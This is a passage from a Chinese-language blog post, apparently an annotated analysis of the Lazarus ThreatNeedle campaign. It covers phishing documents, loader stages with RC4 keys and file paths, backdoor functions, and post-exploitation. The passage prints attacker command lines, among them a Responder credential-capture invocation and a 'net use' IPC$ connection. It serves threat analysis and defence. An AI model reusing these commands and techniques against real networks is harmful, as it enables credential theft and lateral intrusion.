1170w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/0a5c6ff4a911159517dda27795d5ef89-10-585x379.png 585w\" sizes=\"auto, (max-width: 610px) 100vw, 610px\" \/><\/p>\n<p data-diff-id=\"ct-diff-id-K7OMVONY\">\u8be5\u6587\u4ef6\u5305\u542b\u4eba\u53e3\u5065\u5eb7\u8bc4\u4f30\u9879\u76ee\u7684\u4fe1\u606f\uff0c\u8fd9\u5374\u4e0e\u9493\u9c7c\u90ae\u4ef6\u7684\u4e3b\u9898\u6ca1\u6709\u76f4\u63a5\u5173\u7cfb:<\/p>\n<p 
data-diff-id=\"ct-diff-id-K7OMVONY\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-796\" title=\"0e164d0abc29d7a03dcbda7dad9fdc2a\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/0e164d0abc29d7a03dcbda7dad9fdc2a.png\" alt=\"0e164d0abc29d7a03dcbda7dad9fdc2a\" width=\"620\" height=\"463\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/0e164d0abc29d7a03dcbda7dad9fdc2a.png 1206w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/0e164d0abc29d7a03dcbda7dad9fdc2a-768x573.png 768w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/0e164d0abc29d7a03dcbda7dad9fdc2a-1170x873.png 1170w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/0e164d0abc29d7a03dcbda7dad9fdc2a-585x437.png 585w\" sizes=\"auto, (max-width: 620px) 100vw, 620px\" \/><\/p>\n<p data-diff-id=\"ct-diff-id-K7OMVONY\">Word\u6587\u6863\u4e2d\u5305\u542b\u6076\u610f\u5b8f\u4ee3\u7801\uff0c\u4f5c\u7528\u662f\u4e0b\u8f7d\u548c\u6267\u884c\u771f\u6b63\u7684\u6076\u610f\u7a0b\u5e8f\u3002\u4f46\u6700\u521d\u7684\u9493\u9c7c\u5c1d\u8bd5\u6ca1\u6709\u6210\u529f\uff0c\u539f\u56e0\u662f\u76ee\u6807\u7cfb\u7edf\u7684\u5fae\u8f6fOffice\u5b89\u88c5\u4e2d\u7684\u5b8f\u88ab\u7981\u7528\u3002\u4e3a\u4e86\u8bf4\u670d\u76ee\u6807\u5141\u8bb8\u6076\u610f\u5b8f\uff0c\u653b\u51fb\u8005\u53d1\u9001\u4e86\u53e6\u4e00\u5c01\u90ae\u4ef6\uff0c\u8bf4\u660e\u5982\u4f55\u5728\u5fae\u8f6fOffice\u4e2d\u542f\u7528\u5b8f\uff0c\u4f46\u653b\u51fb\u8005\u5728\u8bed\u8a00\u63cf\u8ff0\u4e0a\u51fa\u73b0\u5f88\u591a\u8bed\u6cd5\u9519\u8bef\uff0c\u8fd9\u8868\u660e\u4ed6\u4eec\u53ef\u80fd\u4e0d\u662f\u4ee5\u4fc4\u8bed\u4e3a\u6bcd\u8bed\u7684\u4eba\uff0c\u800c\u662f\u4f7f\u7528\u4e86\u7ffb\u8bd1\u5de5\u5177\uff1a<\/p>\n<p data-diff-id=\"ct-diff-id-K7OMVONY\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-797\" title=\"80916f0d1830162bceb45587611183a3\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/80916f0d1830162bceb45587611183a3.png\" alt=\"80916f0d1830162bceb45587611183a3\" 
width=\"648\" height=\"416\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/80916f0d1830162bceb45587611183a3.png 1426w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/80916f0d1830162bceb45587611183a3-768x492.png 768w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/80916f0d1830162bceb45587611183a3-1170x750.png 1170w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/80916f0d1830162bceb45587611183a3-585x375.png 585w\" sizes=\"auto, (max-width: 648px) 100vw, 648px\" \/><\/p>\n<p data-diff-id=\"ct-diff-id-K7OMVONY\">2020\u5e746\u67083\u65e5\uff0c\u5176\u4e2d\u4e00\u4e2a\u6076\u610f\u9644\u4ef6\u88ab\u5458\u5de5\u6253\u5f00\uff0c\u653b\u51fb\u8005\u83b7\u5f97\u4e86\u5185\u7f51\u7684\u4e00\u4e2a\u9a7b\u70b9\u3002\u5a01\u80c1\u8005\u5728\u8fdc\u63a7\u6210\u529f\u540e\u4ece\u786c\u76d8\u4e0a\u62b9\u53bb\u4e86word\u542f\u52a8\u8fdc\u63a7\u65f6\u4ea7\u751f\u7684\u4e34\u65f6\u6587\u4ef6\uff0c\u8fd9\u610f\u5473\u7740\u5b83\u4eec\u65e0\u6cd5\u88ab\u83b7\u5f97\u3002 \u5c3d\u7ba1\u5982\u6b64\uff0c\u6839\u636e\u6211\u4eec\u7684\u9065\u6d4b\uff0c\u8fd8\u662f\u68c0\u7d22\u5230\u4e86\u4e00\u4e2a\u4e0e\u6b64word\u9493\u9c7c\u76f8\u5173\u7684\u53e6\u4e00\u4e2a\u9493\u9c7c\u6587\u6863\uff0c\u8fd9\u4e2a\u9065\u6d4b\u51fa\u6765\u7684\u9493\u9c7c\u6587\u6863\u662f\u5173\u4e8e\u53d1\u7535\u673a\/\u7535\u529b\u884c\u4e1a\u5de5\u7a0b\u5e08\u7684\u5c97\u4f4d\u63cf\u8ff0\uff1a<\/p>\n<p data-diff-id=\"ct-diff-id-K7OMVONY\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-798\" title=\"8fd0e59814de2ea1ce55ea7819a6268d\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/8fd0e59814de2ea1ce55ea7819a6268d.png\" alt=\"8fd0e59814de2ea1ce55ea7819a6268d\" width=\"619\" height=\"428\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/8fd0e59814de2ea1ce55ea7819a6268d.png 1354w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/8fd0e59814de2ea1ce55ea7819a6268d-768x531.png 768w, 
http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/8fd0e59814de2ea1ce55ea7819a6268d-1170x809.png 1170w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/8fd0e59814de2ea1ce55ea7819a6268d-585x404.png 585w\" sizes=\"auto, (max-width: 619px) 100vw, 619px\" \/><\/p>\n<p data-diff-id=\"ct-diff-id-K7OMVONY\">\u5b83\u521b\u5efa\u4e86\u4e00\u4e2a\u6709\u6548\u8f7d\u8377\u548c\u5feb\u6377\u65b9\u5f0f\u6587\u4ef6\uff0c\u7136\u540e\u901a\u8fc7\u4f7f\u7528\u547d\u4ee4\u884c\u53c2\u6570\u7ee7\u7eed\u6267\u884c\u6709\u6548\u8f7d\u8377\uff1a<\/p>\n<blockquote>\n<p data-diff-id=\"ct-diff-id-K7OMVONY\">\u8fd9\u91cc\u4eceword\u9493\u9c7c\u5230\u8fdc\u63a7\u4e3b\u8fdb\u7a0b\u542f\u52a8\u73af\u8282\u4ecd\u7136\u6709\u7f3a\u5931\uff0c\u4f46\u63a8\u6d4b\u662f\u8fdc\u7a0bdll\u4e0b\u8f7d\uff0c\u7136\u540erundll32\u542f\u52a8dll\u6587\u4ef6\uff0c\u8fd9\u4e2adll\u5c31\u662fThreatNeedle\u540e\u95e8\u7684\u542f\u52a8\u5668\uff0c\u4f30\u8ba1\u662f\u4e2ashellcode_loader\uff0c\u786c\u7f16\u7801\u7684\u53c2\u6570\u662f\u4e3a\u4e86\u4f20\u53c2\u7ed5\u8fc7\u6c99\u7bb1\u68c0\u6d4b\u3002LNK\u5199\u5165\u5230\u542f\u52a8\u76ee\u5f55\u505a\u6301\u4e45\u5316\uff0c\u5176\u4e2dLNK\u7684\u542f\u52a8\u53c2\u6570\u4e5f\u5e94\u8be5\u662frundll32\u7684\u547d\u4ee4\u884c\u3002<\/p>\n<\/blockquote>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\">\u2022 Payload\u8def\u5f84: %APPDATA%\\Microsoft\\Windows\\lconcaches.db\r\n\u2022 LNK\u6587\u4ef6\u8def\u5f84: %APPDATA%\\Microsoft\\Windows\\Start\r\nMenu\\Programs\\Startup\\OneDrives.lnk\r\n\u2022 \u547d\u4ee4\u884c\uff0cplease note that the string at the end is hard-coded, but different for each sample\uff08\u8bf7\u6ce8\u610f\uff0c\u7ed3\u5c3e\u7684\u5b57\u7b26\u4e32\u662f\u786c\u7f16\u7801\u7684\uff0c\u4f46\u6bcf\u4e2a\u6837\u672c\u90fd\u4e0d\u540c\uff09:\r\no rundll32.exe [dllpath],Dispatch n2UmQ9McxUds2b29<\/pre>\n<p>&nbsp;<\/p>\n<h1 id=\"id-\u4e8c\u3001C2\u7a0b\u5e8f\u672c\u5730\u690d\u5165\u6d41\u7a0b\" class=\"ct-heading\" 
data-diff-id=\"ct-diff-id-akoBMReL\"><span class=\"ez-toc-section\" id=\"%E4%BA%8C%E3%80%81C2%E7%A8%8B%E5%BA%8F%E6%9C%AC%E5%9C%B0%E6%A4%8D%E5%85%A5%E6%B5%81%E7%A8%8B\"><\/span>\u4e8c\u3001C2\u7a0b\u5e8f\u672c\u5730\u690d\u5165\u6d41\u7a0b<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>\u672c\u5730\u542f\u52a8\u5230\u690d\u5165\u6d41\u7a0b\uff1a<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-799\" title=\"b93b5525c619e61d526df57e60eaf765\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b93b5525c619e61d526df57e60eaf765.png\" alt=\"b93b5525c619e61d526df57e60eaf765\" width=\"1646\" height=\"750\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b93b5525c619e61d526df57e60eaf765.png 1646w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b93b5525c619e61d526df57e60eaf765-768x350.png 768w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b93b5525c619e61d526df57e60eaf765-1536x700.png 1536w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b93b5525c619e61d526df57e60eaf765-1170x533.png 1170w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b93b5525c619e61d526df57e60eaf765-585x267.png 585w\" sizes=\"auto, (max-width: 1646px) 100vw, 1646px\" \/><\/p>\n<p>&nbsp;<\/p>\n<h1 id=\"id-\u4e09\u3001ThreatNeedle\u5b89\u88c5\u5668\uff08Installer\uff09\" class=\"ct-heading\" data-diff-id=\"ct-diff-id-lU3Worvs\"><span class=\"ez-toc-section\" id=\"%E4%B8%89%E3%80%81ThreatNeedle%E5%AE%89%E8%A3%85%E5%99%A8%EF%BC%88Installer%EF%BC%89\"><\/span>\u4e09\u3001ThreatNeedle\u5b89\u88c5\u5668\uff08Installer\uff09<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<blockquote><p>\u6b64\u8fc7\u7a0b\u4e3b\u8981\u76ee\u7684\uff0c\u7ed5\u6c99\u7bb1\uff0c\u672c\u5730\u6587\u4ef6copy\uff0c\u9690\u533f\u81ea\u8eab\uff0c\u4ee5\u53ca\u901a\u8fc7\u7cfb\u7edf\u670d\u52a1\u6301\u4e45\u5316\u3002<\/p><\/blockquote>\n<p 
data-diff-id=\"ct-diff-id-R41pmeSK\">\u542f\u52a8\u540e\uff0c\u6076\u610f\u8f6f\u4ef6\u4f7f\u7528RC4\u89e3\u5bc6\u4e00\u4e2a\u5d4c\u5165\u5f0f\u5b57\u7b26\u4e32\uff08\u5bc6\u94a5\uff1aB6 B7 2D 8C 6B 5F 14 DF B1 38 A1 73 89 C1 D2 C4\uff09\u5e76\u5c06\u5176\u4e0e &#8220;7486513879852 &#8220;\u8fdb\u884c\u6bd4\u8f83\u3002\u5982\u679c \u7528\u6237\u5728\u6ca1\u6709\u547d\u4ee4\u884c\u53c2\u6570\u7684\u60c5\u51b5\u4e0b\u6267\u884c\u8fd9\u4e2a\u6076\u610f\u8f6f\u4ef6\uff0c\u8be5\u6076\u610f\u8f6f\u4ef6\u4f1a\u542f\u52a8\u4e00\u4e2a\u5408\u6cd5\u7684\u8ba1\u7b97\u5668\u3002 \u5728\u611f\u67d3\u8fc7\u7a0b\u4e2d\uff0c\u6076\u610f\u8f6f\u4ef6\u4ecenetsvc\u4e2d\u968f\u673a\u9009\u62e9\u4e86\u4e00\u4e2a\u670d\u52a1\u540d\u79f0\uff0c\u4ee5\u4fbf\u5c06\u5176\u7528\u4e8e\u6709\u6548\u8f7d\u8377\u521b\u5efa\u8def\u5f84\u3002\u7136\u540e\uff0c\u6076\u610f\u8f6f\u4ef6\u5728\u7cfb\u7edf\u6587\u4ef6\u5939\u4e2d\u521b\u5efa\u4e00\u4e2a\u540d\u4e3abcdbootinfo.tlp\u7684\u6587\u4ef6\uff0c\u5176\u4e2d\u5305\u542b\u611f\u67d3\u65f6\u95f4\u548c\u968f\u673a\u9009\u62e9\u7684\u670d\u52a1\u540d\u79f0\u3002\u6211\u4eec\u53d1\u73b0\uff0c \u6076\u610f\u8f6f\u4ef6\u64cd\u4f5c\u8005\u68c0\u67e5\u8fd9\u4e2a\u6587\u4ef6\uff0c\u4ee5\u4e86\u89e3\u8fdc\u7a0b\u4e3b\u673a\u662f\u5426\u88ab\u611f\u67d3\uff0c\u5982\u679c\u88ab\u611f\u67d3\uff0c\u5219\u611f\u67d3\u53d1\u751f\u7684\u65f6\u95f4\u3002 \u7136\u540e\uff0c\u5b83\u4f7f\u7528RC4\u7b97\u6cd5\u5bf9\u5d4c\u5165\u7684\u6709\u6548\u8f7d\u8377\u8fdb\u884c\u89e3\u5bc6\uff0c\u5c06\u5176\u4fdd\u5b58\u5728\u5f53\u524d\u76ee\u5f55\u4e0b\u968f \u673a\u521b\u5efa\u7684\u4e94\u5b57\u7b26\u6587\u4ef6\u540d\u7684.xml\u6269\u5c55\u540d\u4e2d\uff0c\u7136\u540e\u5c06\u5176\u590d\u5236\u5230\u6269\u5c55\u540d\u4e3a.sys\u7684\u7cfb\u7edf\u6587\u4ef6\u5939\u4e2d\u3002<\/p>\n<p 
data-diff-id=\"ct-diff-id-rsSWdYqS\">\u8fd9\u6700\u540e\u7684\u6709\u6548\u8f7d\u8377\u662f\u5728\u5185\u5b58\u4e2d\u8fd0\u884c\u7684ThreatNeedle\u52a0\u8f7d\u5668\u3002\u6b64\u65f6\uff0c\u52a0\u8f7d\u5668\u4f7f\u7528\u4e0d\u540c\u7684RC4\u5bc6\u94a5\uff083D 68 D0 0A B1 0E C6 AF DD EE 18 8E F4 A1 D6 20\uff09\uff0c\u843d\u5730\u7684\u6076\u610f\u8f6f\u4ef6\u88ab\u6ce8\u518c\u4e3a\u4e00\u4e2aWindows\u670d\u52a1\u5e76\u542f\u52a8\u3002\u6b64\u5916\uff0c\u8be5\u6076\u610f\u8f6f\u4ef6\u5c06\u914d\u7f6e\u6570\u636e\u4fdd\u5b58\u4e3a\u7528RC4\u52a0\u5bc6\u7684\u6ce8\u518c\u8868\u5bc6\u94a5\u3002<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\GameConfig- Description<\/pre>\n<p>&nbsp;<\/p>\n<h1 id=\"id-\u56db\u3001ThreatNeedle\u52a0\u8f7d\u5668\uff08loader\uff09\" class=\"ct-heading\" data-diff-id=\"ct-diff-id-70RQvkR4\"><span class=\"ez-toc-section\" id=\"%E5%9B%9B%E3%80%81ThreatNeedle%E5%8A%A0%E8%BD%BD%E5%99%A8%EF%BC%88loader%EF%BC%89\"><\/span>\u56db\u3001ThreatNeedle\u52a0\u8f7d\u5668\uff08loader\uff09<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<blockquote><p>\u6b64\u8fc7\u7a0b\u4e3b\u8981\u89e3\u5bc6\u8f7d\u8377\uff0c\u5e76\u901a\u8fc7shellcode_loader\u65b9\u5f0f\u5c06\u771f\u6b63\u7684\u8fdc\u63a7\u8f7d\u8377\u4ece\u5185\u5b58\u4e2d\u76f4\u63a5\u52a0\u8f7d\u8d77\u6765\u3002<\/p><\/blockquote>\n<p>\u8be5\u7ec4\u4ef6\u8d1f\u8d23\u5c06\u6700\u7ec8\u7684\u540e\u95e8\u6709\u6548\u8f7d\u8377\u52a0\u8f7d\u5230\u5185\u5b58\u4e2d\u3002\u4e3a\u4e86\u505a\u5230\u8fd9\u4e00\u70b9\uff0c\u8be5\u6076\u610f\u8f6f\u4ef6\u4f7f\u7528\u51e0\u79cd\u6280\u672f\u6765\u89e3\u5bc6\u5176\u6709\u6548\u8f7d\u8377\u3002<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">- \u4ece\u6ce8\u518c\u8868\u52a0\u8f7d\u6709\u6548\u8f7d\u8377\u3002 \r\n- \u5728\u89e3\u5bc6RC4\u548c\u89e3\u538b\u540e\u4ece\u81ea\u8eab\u52a0\u8f7d\u6709\u6548\u8f7d\u8377\u3002 \r\n- 
\u5728\u89e3\u5bc6AES\u548c\u89e3\u538b\u540e\u4ece\u81ea\u8eab\u52a0\u8f7d\u6709\u6548\u8f7d\u8377\u3002\r\n- \u89e3\u538b\u540e\u4ece\u81ea\u8eab\u52a0\u8f7d\u6709\u6548\u8f7d\u8377\u3002\r\n- \u5728\u4e00\u5b57\u8282XOR\u540e\u4ece\u81ea\u8eab\u52a0\u8f7d\u6709\u6548\u8f7d\u8377\u3002<\/pre>\n<p>\u5927\u591a\u6570\u52a0\u8f7d\u5668\u7c7b\u578b\u7684\u6076\u610f\u8f6f\u4ef6\u4f1a\u68c0\u67e5\u547d\u4ee4\u884c\u53c2\u6570\uff0c\u53ea\u6709\u5728\u7ed9\u51fa\u9884\u671f\u53c2\u6570\u65f6\u624d\u8fd0\u884c\u6076\u610f\u7a0b\u5e8f\u3002\u8fd9\u662fThreatNeedle\u52a0\u8f7d\u5668\u7684\u4e00\u4e2a\u5171\u540c\u7279\u5f81\u3002\u6211\u4eec\u770b\u5230\u7684\u6700\u5e38\u89c1\u7684\u4f8b\u5b50\u4e0eThreatNeedle\u5b89\u88c5\u7a0b\u5e8f\u7c7b\u4f3c\uff0c\u6076\u610f\u8f6f\u4ef6\u4f7f\u7528RC4\u89e3\u5bc6\u4e00\u4e2a\u5d4c\u5165\u5f0f\u5b57\u7b26\u4e32\uff0c\u5e76\u5728\u542f\u52a8\u65f6\u4e0e\u53c2\u6570&#8220;Sx6BrUk4v4rqBFBV&#8221;\u8fdb\u884c\u6bd4\u8f83\u3002\u5982\u679c\u5339\u914d\uff0c\u6076\u610f\u8f6f\u4ef6\u5f00\u59cb\u4f7f\u7528\u76f8\u540c\u7684RC4\u5bc6\u94a5\u89e3\u5bc6\u5176\u5d4c\u5165\u5f0f\u6709\u6548\u8f7d\u8377\u3002\u89e3\u5bc6\u540e\u7684\u6709\u6548\u8f7d\u8377\u662f\u4e00\u4e2a\u538b\u7f29\u6863\u6848\uff0c\u968f\u540e\u5728\u8fd9\u4e2a\u8fc7\u7a0b\u4e2d\u88ab\u89e3\u538b\u7f29\u3002\u6700\u7ec8\uff0cThreatNeedle\u6076\u610f\u8f6f\u4ef6\u5728\u5185\u5b58\u4e2d\u52a0\u8f7d\u3002 
\u52a0\u8f7d\u5668\u7684\u53e6\u4e00\u4e2a\u53d8\u4f53\u4ece\u53d7\u5bb3\u8005\u7684\u6ce8\u518c\u8868\u4e2d\u51c6\u5907\u4e0b\u4e00\u9636\u6bb5\u7684\u6709\u6548\u8f7d\u8377\u3002\u6b63\u5982\u6211\u4eec\u4ece\u5b89\u88c5\u7a0b\u5e8f\u7684\u6076\u610f\u8f6f\u4ef6\u63cf\u8ff0\u4e2d\u770b\u5230\u7684\uff0c\u6211\u4eec\u6000\u7591\u6ce8\u518c\u8868\u952e\u662f\u7531\u5b89\u88c5\u7a0b\u5e8f\u7ec4\u4ef6\u521b\u5efa\u7684\u3002\u4ece\u6ce8\u518c\u8868\u4e2d\u83b7\u53d6\u7684\u6570\u636e\u4f7f\u7528RC4\u8fdb\u884c\u89e3\u5bc6\uff0c\u7136\u540e\u8fdb\u884c\u89e3\u538b\u7f29\u3002\u6700\u7ec8\uff0c\u5b83\u88ab\u52a0\u8f7d\u5230\u5185\u5b58\u4e2d\u5e76\u8c03\u7528\u5176\u5bfc\u51fa\u51fd\u6570\u3002<\/p>\n<p>&nbsp;<\/p>\n<h1 id=\"id-\u4e94\u3001ThreatNeedle\u540e\u95e8\" class=\"ct-heading\" data-diff-id=\"ct-diff-id-WDKnNsOR\"><span class=\"ez-toc-section\" id=\"%E4%BA%94%E3%80%81ThreatNeedle%E5%90%8E%E9%97%A8\"><\/span>\u4e94\u3001ThreatNeedle\u540e\u95e8<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>\u5728\u5185\u5b58\u4e2d\u6267\u884c\u7684\u6700\u7ec8\u6709\u6548\u8f7d\u8377\u624d\u662f\u5b9e\u9645\u7684ThreatNeedle\u540e\u95e8\uff0c\u5b83\u6709\u4ee5\u4e0b\u529f\u80fd\u6765\u63a7\u5236\u53d7\u611f\u67d3\u7684\u673a\u5668\uff1a<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">- \u64cd\u4f5c\u6587\u4ef6\/\u76ee\u5f55\r\n- \u7cfb\u7edf\u4fe1\u606f\u6536\u96c6 \r\n- \u63a7\u5236\u540e\u95e8\u8fdb\u7a0b \r\n- \u8fdb\u5165\u7761\u7720\u6216\u4f11\u7720\u6a21\u5f0f \r\n- \u66f4\u65b0\u540e\u95e8\u914d\u7f6e \r\n- \u8fdc\u7a0b\u547d\u4ee4\u6267\u884c<\/pre>\n<p>&nbsp;<\/p>\n<h1 id=\"id-\u516d\u3001\u540e\u5229\u7528\u9636\u6bb5\" class=\"ct-heading\" data-diff-id=\"ct-diff-id-kS2vEyr4\"><span class=\"ez-toc-section\" id=\"%E5%85%AD%E3%80%81%E5%90%8E%E5%88%A9%E7%94%A8%E9%98%B6%E6%AE%B5\"><\/span>\u516d\u3001\u540e\u5229\u7528\u9636\u6bb5<span 
class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>\u5728\u5176\u4e2d\u4e00\u53f0\u4e3b\u673a\u4e0a\uff0c\u6211\u4eec\u53d1\u73b0\u8be5\u653b\u51fb\u8005\u6267\u884c\u4e86\u4e00\u4e2a\u540d\u4e3a<a class=\"ct-link\" href=\"https:\/\/github.com\/lgandx\/Responder\/\" target=\"_blank\" rel=\"noopener\" data-auto_update=\"0\">Responder<\/a>\u7684\u51ed\u8bc1\u91c7\u96c6\u5de5\u5177\uff0c\u5e76\u4f7f\u7528Windows\u547d\u4ee4\u6a2a\u5411\u79fb\u52a8\u3002Lazarus\u7a81\u7834\u4e86\u5185\u7f51\u7f51\u7edc\u9694\u79bb\u7b56\u7565\uff0c\u662f\u901a\u8fc7\u5165\u4fb5\u4e00\u4e2a\u865a\u62df\u8def\u7531\u5668\uff0c\u4ece\u4e00\u4e2a\u4e0e\u4e92\u8054\u7f51\u5b8c\u5168\u9694\u79bb\u7684\u7f51\u6bb5\u4e2d\u7a83\u53d6\u4e86\u6570\u636e\uff0c\u4e0b\u9762\u662f\u8c03\u67e5\u5230\u7684\u5927\u81f4\u65f6\u95f4\u7ebf\uff1a<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-800\" title=\"84e1dca5ab84964b8845a333da6ed64e\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/84e1dca5ab84964b8845a333da6ed64e.png\" alt=\"84e1dca5ab84964b8845a333da6ed64e\" width=\"1698\" height=\"986\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/84e1dca5ab84964b8845a333da6ed64e.png 1698w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/84e1dca5ab84964b8845a333da6ed64e-768x446.png 768w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/84e1dca5ab84964b8845a333da6ed64e-1536x892.png 1536w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/84e1dca5ab84964b8845a333da6ed64e-1170x679.png 1170w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/84e1dca5ab84964b8845a333da6ed64e-585x340.png 585w\" sizes=\"auto, (max-width: 1698px) 100vw, 1698px\" \/><\/p>\n<p>&nbsp;<\/p>\n<h1 id=\"id-\u4e03\u3001\u51ed\u636e\u6536\u96c6\" class=\"ct-heading\" data-diff-id=\"ct-diff-id-yk6ZOEhY\"><span class=\"ez-toc-section\" id=\"%E4%B8%83%E3%80%81%E5%87%AD%E6%8D%AE%E6%94%B6%E9%9B%86\"><\/span>\u4e03\u3001\u51ed\u636e\u6536\u96c6<span 
class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>\u5728\u8c03\u67e5\u8fc7\u7a0b\u4e2d\uff0c\u6211\u4eec\u53d1\u73b0Responder\u5de5\u5177\u662f\u4ece\u6536\u5230\u9c7c\u53c9\u5f0f\u7f51\u7edc\u9493\u9c7c\u6587\u4ef6\u7684\u5176\u4e2d \u4e00\u53f0\u53d7\u5bb3\u8005\u673a\u5668\u4e0a\u6267\u884c\u7684\u3002\u5728\u6700\u521d\u611f\u67d3\u540e\u7684\u4e00\u5929\uff0c\u6076\u610f\u8f6f\u4ef6\u64cd\u4f5c\u8005\u5c06\u8be5\u5de5\u5177\u653e \u5728\u8be5\u4e3b\u673a\u4e0a\uff0c\u5e76\u4f7f\u7528\u4ee5\u4e0b\u547d\u4ee4\u6267\u884c\u3002<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">[Responder file path] -i [IP address] -rPv\r\n\r\n\u9644\u4e0a\u53c2\u6570\u89e3\u91ca\uff1a\r\n-r, --wredir          Enable answers for netbios wredir suffix queries.\r\n                      Answering to wredir will likely break stuff on the\r\n                      network. Default: Off\r\n-P, --ProxyAuth       Force NTLM (transparently)\/Basic (prompt) \r\n                      authentication for the proxy. WPAD doesn't need to\r\n                      be ON. This option is highly effective when combined\r\n                      with -r. 
Default: Off\r\n-v, --verbose         Increase verbosity.<\/pre>\n<blockquote><p>\u4eceresponder\u5230\u83b7\u53d6\u5230\u67d0\u53f0server\u51ed\u636e\u4e2d\u95f4\u6709\u7f3a\u5931\u7ec6\u8282\uff0c\u4e24\u79cd\u53ef\u80fd\uff0c1\u3001\u672c\u5730\u51ed\u636e\u548c\u8fdc\u7a0bserver\u4e00\u81f4\uff0c\u4f7f\u7528mimikatz\u4e4b\u7c7b\u7684\u5de5\u5177\u5bfc\u51fa\u4e86\u51ed\u636e\u30022\u3001\u5f3a\u5236server\u53d1\u8d77\u4e86\u5bf9\u653b\u51fb\u8005\u7684\u8ba4\u8bc1\uff0cresponder\u83b7\u53d6\u5230NetNTLMHash\u540e\uff0c\u79bb\u7ebf\u4f7f\u7528hashcat\u7834\u89e3\u51fa\u660e\u6587\u5bc6\u7801\u3002\u4ece\u6a2a\u5411\u79fb\u52a8\u73af\u8282\u53ef\u4ee5\u770b\u51fa\uff0c\u83b7\u53d6\u5230\u7684\u662f\u660e\u6587\u5bc6\u7801\u3002<\/p><\/blockquote>\n<p>\u51e0\u5929\u540e\uff0c\u653b\u51fb\u8005\u5f00\u59cb\u4ece\u8be5\u4e3b\u673a\u6a2a\u5411\u79fb\u52a8\u3002\u56e0\u6b64\uff0c\u6211\u4eec\u8bc4\u4f30\u653b\u51fb\u8005\u6210\u529f\u5730\u4ece\u8be5\u4e3b\u673a\u83b7\u5f97\u4e86\u767b\u5f55\u51ed\u8bc1\uff0c\u5e76\u5f00\u59cb\u4f7f\u7528\u5b83\u4eec\u8fdb\u884c\u8fdb\u4e00\u6b65\u7684\u6076\u610f\u6d3b\u52a8\u3002<\/p>\n<p>&nbsp;<\/p>\n<h1 id=\"id-\u516b\u3001\u6a2a\u5411\u79fb\u52a8\" class=\"ct-heading\" data-diff-id=\"ct-diff-id-u3rjdYRC\"><span class=\"ez-toc-section\" id=\"%E5%85%AB%E3%80%81%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8\"><\/span>\u516b\u3001\u6a2a\u5411\u79fb\u52a8<span 
class=\"ez-toc-section-end\"><\/span><\/h1>\n<blockquote><p>\u6b64\u5904\u7f3a\u5931\u6bcf\u53f0server\u662f\u5426\u90fd\u662f\u76f8\u540c\u7684\u6a2a\u5411\u79fb\u52a8\u65b9\u5f0f\uff0c\u6682\u4e14\u8ba4\u4e3a\u51ed\u636e\u90fd\u76f8\u540c\uff0c\u6216\u5229\u7528\u65b9\u5f0f\u76f8\u540c\u3002<\/p><\/blockquote>\n<p>\u5728\u83b7\u5f97\u767b\u5f55\u51ed\u8bc1\u540e\uff0c\u8be5\u884c\u4e3a\u4eba\u5f00\u59cb\u4ece\u5de5\u4f5c\u7ad9\u6a2a\u5411\u79fb\u52a8\u5230\u670d\u52a1\u5668\u4e3b\u673a\u3002\u91c7\u7528\u4e86\u5178\u578b\u7684\u6a2a\u5411\u79fb\u52a8\u65b9\u6cd5\uff0c\u4f7f\u7528Windows\u547d\u4ee4\u3002\u9996\u5148\uff0c\u4f7f\u7528 &#8220;net use &#8220;\u547d\u4ee4\u4e0e\u8fdc\u7a0b\u4e3b\u673a\u5efa\u7acb\u7f51\u7edc\u8fde\u63a5\u3002<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">net use \\\\[IP address]\\IPC$ \"[password]\" \/u:\"[user name]\" &gt; $temp\\~tmp5936t.tmp 